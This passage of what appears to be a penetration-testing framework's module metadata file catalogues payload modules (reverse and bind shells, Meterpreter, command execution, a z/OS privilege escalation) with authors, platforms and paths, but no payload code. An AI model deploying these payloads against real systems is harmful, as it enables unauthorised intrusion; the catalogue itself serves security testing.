"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_https": {
"name": "Apple_iOS Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_tcp": {
"name": "Apple_iOS Meterpreter, Reverse TCP Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/shell_reverse_tcp": {
"name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline",
"full_name": "payload/apple_ios/aarch64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-19 15:39:29 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_http": {
"name": "Apple_iOS Meterpreter, Reverse HTTP Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_https": {
"name": "Apple_iOS Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_tcp": {
"name": "Apple_iOS Meterpreter, Reverse TCP Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/sparc/shell_bind_tcp": {
"name": "BSD Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/sparc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/sparc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/sparc/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/sparc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/sparc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/vax/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/vax/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "vax",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-17 19:28:07 +0000",
"path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/vax/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/exec": {
"name": "BSD x64 Execute Command",
"full_name": "payload/bsd/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/exec.rb",
"is_install_path": true,
"ref_name": "bsd/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_ipv6_tcp": {
"name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/bsd/x64/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_tcp": {
"name": "BSD x64 Shell Bind TCP",
"full_name": "payload/bsd/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"joev <joev@metasploit.com>"
],
"description": "Bind an arbitrary command to an arbitrary port",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_tcp_small": {
"name": "BSD x64 Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/x64/shell_bind_tcp_small",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_tcp_small",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_ipv6_tcp": {
"name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/bsd/x64/shell_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_tcp": {
"name": "BSD x64 Shell Reverse TCP",
"full_name": "payload/bsd/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"joev <joev@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_tcp_small": {
"name": "BSD x64 Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/x64/shell_reverse_tcp_small",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_tcp_small",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/exec": {
"name": "BSD Execute Command",
"full_name": "payload/bsd/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"snagg <snagg@openssl.it>",
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/exec.rb",
"is_install_path": true,
"ref_name": "bsd/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/metsvc_bind_tcp": {
"name": "FreeBSD Meterpreter Service, Bind TCP",
"full_name": "payload/bsd/x86/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/metsvc_reverse_tcp": {
"name": "FreeBSD Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/bsd/x86/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/bind_ipv6_tcp": {
"name": "BSD Command Shell, Bind TCP Stager (IPv6)",
"full_name": "payload/bsd/x86/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/bind_tcp": {
"name": "BSD Command Shell, Bind TCP Stager",
"full_name": "payload/bsd/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/find_tag": {
"name": "BSD Command Shell, Find Tag Stager",
"full_name": "payload/bsd/x86/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/reverse_ipv6_tcp": {
"name": "BSD Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/bsd/x86/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Stager",
"full_name": "payload/bsd/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_bind_tcp": {
"name": "BSD Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_bind_tcp_ipv6": {
"name": "BSD Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/bsd/x86/shell_bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_find_port": {
"name": "BSD Command Shell, Find Port Inline",
"full_name": "payload/bsd/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_find_tag": {
"name": "BSD Command Shell, Find Tag Inline",
"full_name": "payload/bsd/x86/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a shell on an established connection (proxy/nat safe)",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_reverse_tcp_ipv6": {
"name": "BSD Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/bsd/x86/shell_reverse_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_reverse_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell/bind_tcp": {
"name": "BSDi Command Shell, Bind TCP Stager",
"full_name": "payload/bsdi/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell/reverse_tcp": {
"name": "BSDi Command Shell, Reverse TCP Stager",
"full_name": "payload/bsdi/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_bind_tcp": {
"name": "BSDi Command Shell, Bind TCP Inline",
"full_name": "payload/bsdi/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_find_port": {
"name": "BSDi Command Shell, Find Port Inline",
"full_name": "payload/bsdi/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_reverse_tcp": {
"name": "BSDi Command Shell, Reverse TCP Inline",
"full_name": "payload/bsdi/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/apf_privesc_jcl": {
"name": "JCL to Escalate Privileges",
"full_name": "payload/cmd/mainframe/apf_privesc_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls",
"Ayoub"
],
"description": "(Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.)",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": 21,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/apf_privesc_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/bind_shell_jcl": {
"name": "Z/OS (MVS) Command Shell, Bind TCP",
"full_name": "payload/cmd/mainframe/bind_shell_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which creates a bind shell\n This implmentation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 16:52:36 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/bind_shell_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/generic_jcl": {
"name": "Generic JCL Test for Mainframe Exploits",
"full_name": "payload/cmd/mainframe/generic_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/generic_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/reverse_shell_jcl": {
"name": "Z/OS (MVS) Command Shell, Reverse TCP",
"full_name": "payload/cmd/mainframe/reverse_shell_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 18:27:29 +0000",
"path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb",
"is_install_path": true,
"ref_name": "cmd/mainframe/reverse_shell_jcl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_awk": {
"name": "Unix Command Shell, Bind TCP (via AWK)",
"full_name": "payload/cmd/unix/bind_awk",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"espreto <robertoespreto@gmail.com>",
"Ulisses Castro <uss.thebug@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell via GNU AWK",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-16 04:06:58 +0000",
